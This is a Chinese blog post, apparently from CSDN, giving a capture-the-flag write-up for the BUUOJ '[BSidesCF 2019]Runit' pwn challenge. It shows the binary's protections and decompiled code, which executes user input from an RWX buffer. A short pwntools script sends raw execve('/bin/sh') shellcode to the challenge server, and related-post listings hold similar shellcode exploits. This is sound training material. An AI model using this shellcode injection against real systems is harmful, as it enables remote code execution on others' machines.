[BSidesCF 2019]Runit

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量42 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132564761
版权

[BSidesCF 2019]Runit

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位,只开了nx

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *buf; // [esp+8h] [ebp-10h]

  buf = mmap(0, 0x400u, 7, 34, 0, 0);
  alarm(0xAu);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 2, 0);
  puts("Send me stuff!!");
  if ( read(0, buf, 0x400u) < 0 )
  {
    puts("Error reading!");
    exit(1);
  }
  ((void (*)(void))buf)();
  return 0;
}

buf开辟了7权限

然后最后还执行了buf

(又水一题x

from pwn import*
from Yapack import *

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26129,"./pwn",10)

sl(b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80')

ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BSidesSF 2019 部分writeup
Kr的博客
03-06 2424
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
runit服务管理服务进程-自动拉起
06-29
runit服务管理服务进程-自动拉起】 runit 是一款轻量级的服务管理系统,尤其适合于嵌入式系统和小型服务器。它以其简洁、高效和低资源消耗而受到青睐。runit 提供了两个核心功能:在系统启动时启动预设的服务,...
BUUCTF(pwn)[BSidesCF 2019]Runit
半岛铁盒的博客
04-12 225
from pwn import * p=remote("node3.buuoj.cn",25145) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.interactive()
BUUCTF pwn Runit&&RunitPlusPlus
热门推荐
stareforever的博客
01-13 1万+
[BSidesCF 2019]Runit 查看保护 IDA查看程序流 读入buf并执行,那么可以写入shellcode 完整ex from pwn import * context(log_level='debug') #io=process("./runit") io=remote("node3.buuoj.cn",28430) io.recv() payload=asm(shellcraft.sh()) io.send(payload) io.interactive() [BSid
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 311
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
[BUUCTF]PWN——[BSidesCF 2019]Runit
BangSen1的博客
04-26 417
[BSidesCF 2019]Runit 例行检查 ,32位,开启NX保护 运行一下。 IDA打开,查看主函数。 buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 from pwn import * p=remote("node3.buuoj.cn",26059) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.
[BUUCTF]PWN——[BSidesCF 2019]Runit(mmap+shellcode)
mcmuyanga的博客
04-12 503
[BSidesCF 2019]Runit 例行检查,32位程序,开启了nx保护 运行一下看看大概的情况 ida载入 虽然开了nx,但是buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 exp from pwn import * p=remote("node3.buuoj.cn",25055) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendlin
idea 2019 Run dashboard 面板
01-20
**Idea 2019 Run Dashboard 面板详解** 在IntelliJ IDEA 2019版本中,Run Dashboard是一个非常实用的功能,它提供了一个集中管理与监控项目运行状态的面板。这个面板允许开发者方便地启动、停止、调试以及监视多个...
runit:Runit源HTTP的镜像
05-08
runit-具有服务监督的UNIX初始化方案runit是一种跨平台的Unix初始化方案,具有服务监督,sysvinit的替代方案和其他初始化方案。 它可以在GNU / Linux,* BSD,MacOSX,Solaris上运行,并且可以轻松地适应其他Unix...
RunItAs以不同的用户权限运行软件
09-07
标题中的“RunItAs以不同的用户权限运行软件”是指一种技术,允许用户在不拥有管理员权限的情况下,模拟管理员权限运行特定的程序。这种技术对于那些需要管理员权限才能正常工作但又不能给予用户完整管理员权限的...
docker-runit-buster:使用runit的debian:buster-slim
02-09
暴行破坏者 ,几乎没有方便的实用程序,utf8语言环境和runit 该映像每天生成一次,如果进行任何安全更新,则将更新,提交软件包列表,这将触发docker-hub映像和所有相关映像的更新。快速使用运行预构建: $ docker ...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 270
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 549
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 966
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 191
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 421
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 328
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络设备安全
weixin_48579910的博客
07-11 823
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
kali 出现run it as root
06-28
"kali出现run it as root"的意思是需要以root用户身份运行某个程序或命令。这通常是因为该程序或命令需要更高的权限才能正常运行。在kali中,root用户是具有最高权限的用户,可以执行系统中的任何操作。因此,如果您...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值